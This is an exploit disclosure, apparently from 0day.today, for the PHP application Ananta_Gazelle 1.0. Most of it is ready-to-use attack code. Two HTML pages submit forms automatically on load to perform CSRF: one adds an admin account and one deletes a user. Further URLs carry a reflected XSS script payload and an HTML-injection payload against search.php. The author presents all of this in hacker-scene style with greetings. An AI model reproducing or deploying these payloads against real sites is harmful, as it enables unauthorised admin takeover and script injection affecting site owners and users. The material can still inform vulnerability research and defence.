Ananta_Gazelle1.0.zip <= Multiple Vulnerabilities

🗓️ 29 Mar 2012 00:00:00Reported by DoSs-DzType

zdt🔗 0day.today👁 13 Views

Ananta_Gazelle1.0.zip has multiple vulnerabilities including CSRF, XSS, and HTML code injection. The first vulnerability is a CSRF that allows an attacker to add or delete an admin. The second vulnerability is an XSS that allows injecting malicious scripts. The third vulnerability is an HTML code injection that allows injecting HTML code

<===============================================================================>
 [»]  Ananta_Gazelle1.0.zip <= Multiple Exploits = CSRF/Xss/Html code injection 
<===============================================================================>  
     [»]  ---> Date :     29- 03- 2012             
     [»]  ---> Author :    Expl0!Ts      
     [»]  ---> Software Link : http://garr.dl.sourceforge.net/project/ananta/stable/Gazelle%201.0%20stable/Ananta_Gazelle1.0.zip
     [»]  ---> Version:              
     [»]  ---> Category:  php             
     [»]  ---> Tested on:  wind xp & ubuntu 10.10
     [»]  ---> Dork : your mind  
<=======================================================>

1- First Vuln its CSRF :

-------------------------------------------------------------------------------< 1

!=> add admin 
!=> vuln p0c :


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> Ananta_Gazelle1.0 add admin by : Expl0!Ts </title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "64","51" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 2;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H1>Ananta_Gazelle1.0 add admin by : Expl0!Ts</H1>
<form method="GET" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="value"/> 
</form>
<form method="POST" name="form1" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="admin2"/>
<input type="hidden" name="pass" value="admin2"/>
<input type="hidden" name="controle" value="admin2"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="active" value="on"/>
<input type="hidden" name="admin[]" value="2"/>
<input type="hidden" name="save" value="Add"/>
<input type="hidden" name="table" value="users"/>
<input type="hidden" name="joindate" value="2012-03-29 12:07:20"/>
</form>

</body>
</html>

----------------------------------------------------------------------------------------------------------------------< 2



!=> Delete admin  
!=> vuln p0c :


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> Ananta_Gazelle1.0 Delete admin by : Expl0!Ts </title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "58" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H1>Ananta_Gazelle1.0 Delete admin by : Expl0!Ts</H1>
<form method="POST" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Delete User">
<input type="hidden" name="number" value="2"/>
<input type="hidden" name="save" value="Delete"/>
<input type="hidden" name="table" value="users"/>
</form>

</body>
</html>



-----------------------------------------------------------------------------------------------------------------


2- secnd vuln its Xss  : 

http://127.0.0.1/ga/search.php?lookup=<script>alert("khaled-Ham-iTs-here n0w ")</script>


----------------------------------------------------------------------------------------------------------------




3- therd vuln its Html Code Injection : 

http://127.0.0.1/ga/search.php?lookup=<h1>Hi in My vuln enJoY ...</h1>


================================================================>
==> greatz : Damane2011 & BaC & black-id & robert m °0°...°0°
==> Thnks y0u : baset and merouane and abdllah my best freind 
================================================================>
EnJoY o_O



#  0day.today [2018-01-01]  #

29 Mar 2012 00:00Current

7.1High risk

Vulners AI Score7.1